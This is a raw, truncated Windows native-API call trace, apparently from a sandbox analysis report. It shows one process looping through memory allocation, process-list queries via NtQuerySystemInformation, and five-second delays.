NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.634] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.642] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.648] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.656] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.663] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.666] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.670] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.673] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.677] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.683] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.690] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.697] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.704] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.711] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.718] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.725] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.728] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.732] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.738] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.739] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.747] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.754] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.761] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.769] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.776] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.777] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, 